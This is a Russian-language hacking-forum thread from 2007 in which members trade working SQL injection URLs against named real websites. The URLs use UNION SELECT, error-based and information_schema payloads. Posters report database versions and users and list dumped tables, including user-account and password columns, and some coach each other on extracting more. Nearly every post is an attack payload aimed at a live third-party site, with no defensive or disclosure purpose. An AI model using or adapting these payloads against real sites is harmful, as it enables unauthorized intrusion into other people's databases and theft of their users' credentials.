HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 31.08.2007, 08:02
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
С нами: 9875796

Репутация: 770
По умолчанию

Цитата:
Сообщение от Termin@L  
http://www.gertrude.org.au/exhibition.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10/*
тут вообще хрен знает какая таблица
http://www.gertrude.org.au/exhibition.php?id=-1+union+select+database(),user(),version(),4,5,6,7 ,8,9,10/*
.ud.rt - @l.ud.rt
4.1.20

http://www.gertrude.org.au/exhibition.php?id=-1+union+select+database(),2,version(),user(),5,6,7 ,8,9,10/*
.ud.rt - ..
4.1.20
gertrude@localhost
______
сейчас дальше попробую раскопать..
 
Ответить с цитированием

  #2  
Старый 31.08.2007, 16:13
phol1eadeux
Участник форума
Регистрация: 07.08.2007
Сообщений: 139
С нами: 9874372

Репутация: 138
По умолчанию

Код:
http://www.hww.ca/media_viewer2_top.asp?Language=E&id=203+OR+1=@@version
Таблица 'HWW_VIEW_User_Accounts'
Колонки
Цитата:
ID
First_Name
Last_Name
Organization_ID
Phone
Email
Username
Password
 
Ответить с цитированием

  #3  
Старый 31.08.2007, 18:30
n3m0
Участник форума
Регистрация: 11.05.2007
Сообщений: 149
С нами: 10001186

Репутация: 247
По умолчанию

http://www.maup.com.ua/news/news.php?idn=-140+union+select+1,2,user(),database(),5,6,7,8,9,1 0,11,12,13/*
Дальше не нарыл! Помогите
 
Ответить с цитированием

  #4  
Старый 31.08.2007, 18:50
n3m0
Участник форума
Регистрация: 11.05.2007
Сообщений: 149
С нами: 10001186

Репутация: 247
По умолчанию

http://romanykultury.info/news/news.php?row=-168+union+select+1,user(),3,database(),5/*
Нужно довести до ума
 
Ответить с цитированием

  #5  
Старый 31.08.2007, 18:54
phol1eadeux
Участник форума
Регистрация: 07.08.2007
Сообщений: 139
С нами: 9874372

Репутация: 138
По умолчанию

Цитата:
Сообщение от n3m0  
http://romanykultury.info/news/news.php?row=-168+union+select+1,user(),3,database(),5/*
Нужно довести до ума
Что мешает, 5 мускул, доводи:
Код:
http://romanykultury.info/news/news.php?row=-168+union+select+1,table_name,3,4,5+from+information_schema.tables/*
 
Ответить с цитированием

  #6  
Старый 31.08.2007, 18:54
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
С нами: 10172486

Репутация: 874
По умолчанию

Ну вот чуть "доведенная до ума"
Тут пятый мускул. Остается только копаться в таблицах
http://romanykultury.info/news/news.php?row=-168+union+select+1,table_name,3,4,5%20from%20infor mation_schema.tables/*


Пока писал кто-то раньше успел.... блин.
 
Ответить с цитированием

  #7  
Старый 31.08.2007, 20:55
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
С нами: 10160966

Репутация: 1719


По умолчанию

protermos.ru
Код:
http://www.protermos.ru/kvl.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,88,table_name,0,1,2,3,4,5,6,7,888,99,0,1,2,3,4,5,6,7,8888,9,0,1,2,3,4,5,6,7,88888,99,0,1,2+from+information_schema.tables/*
version: 5.*
tables:

Код:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
address_book
address_format
banners
banners_history
categories
categories_description
configuration
configuration_group
counter
counter_history
countries
currencies
customers
customers_basket
customers_basket_attributes
customers_groups
customers_info
faqdesk
faqdesk_categories
faqdesk_categories_description
faqdesk_configuration
faqdesk_configuration_group
faqdesk_description
faqdesk_reviews
faqdesk_reviews_description
faqdesk_to_categories
geo_zones
languages
manufacturers
manufacturers_info
newsdesk
newsdesk_categories
newsdesk_categories_description
newsdesk_configuration
newsdesk_configuration_group
newsdesk_description
newsdesk_reviews
newsdesk_reviews_description
newsdesk_to_categories
newsletters
orders
orders_products
orders_products_attributes
orders_products_download
orders_status
orders_status_history
orders_total
phoroom_auth_access
phoroom_banlist
phoroom_categories
phoroom_config
phoroom_disallow
phoroom_forum_prune
phoroom_forums
phoroom_groups
phoroom_posts
phoroom_posts_text
phoroom_privmsgs
phoroom_privmsgs_text
phoroom_ranks
phoroom_search_results
phoroom_search_wordlist
phoroom_search_wordmatch
phoroom_sessions
phoroom_smilies
phoroom_themes
phoroom_themes_name
phoroom_topics
phoroom_topics_watch
phoroom_user_group
phoroom_users
phoroom_vote_desc
phoroom_vote_results
phoroom_vote_voters
phoroom_words
products
products_attributes
products_attributes_download
products_description
products_notifications
products_options
products_options_values
products_options_values_to_products_options
products_prop_options
products_prop_options_values
products_prop_options_values_to_products_prop_options
products_properties
products_to_categories
proterm_pages
proterm_pages_categories
protherm_klo
protherm_plo
protherm_tlo
reviews
reviews_description
sessions
shablon_pages
specials
tax_class
tax_rates
whos_online
zones
zones_to_geo_zones
 
Ответить с цитированием

  #8  
Старый 31.08.2007, 22:20
kair
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
С нами: 10305026

Репутация: 187
По умолчанию

Код:
http://www.opticalsorcery.com/view_tutorial.php?id=7%20union%20select%20concat(admin,char(58),pass,char(58),user,char(58),email,char(58),ID,char(58),website,char(58),firstname,char(58),lastname)%20from%20users/*

5.0.32-Debian_7
Код:
http://www.iloveinns.com/recipes/list.php?id=7-0%20union%20select%201,version()/*

Последний раз редактировалось kair; 31.08.2007 в 23:05..
 
Ответить с цитированием

  #9  
Старый 01.09.2007, 12:01
Dr.Z3r0
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
С нами: 9920546

Репутация: 1796
По умолчанию

http://english.renaultclub.cz/english/links/novyodkaz.php?id='
Postorage SQL к сожелению в нем я не силен (

http://www.argelato.provincia.bologna.it/Statistica.asp?ID=
Microsoft SQL
__________________
Кто я?..

Последний раз редактировалось I-I()/Ib; 01.09.2007 в 12:16..
 
Ответить с цитированием

  #10  
Старый 01.09.2007, 18:40
phol1eadeux
Участник форума
Регистрация: 07.08.2007
Сообщений: 139
С нами: 9874372

Репутация: 138
По умолчанию

Киномост
Код:
http://www.kinomost.ru/index.asp?case=30&distr=-1'+OR+1=(SELECT+db_name())--&pack=0
Таблицы: db_ForumPeople, db_News, akter, akter_top
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.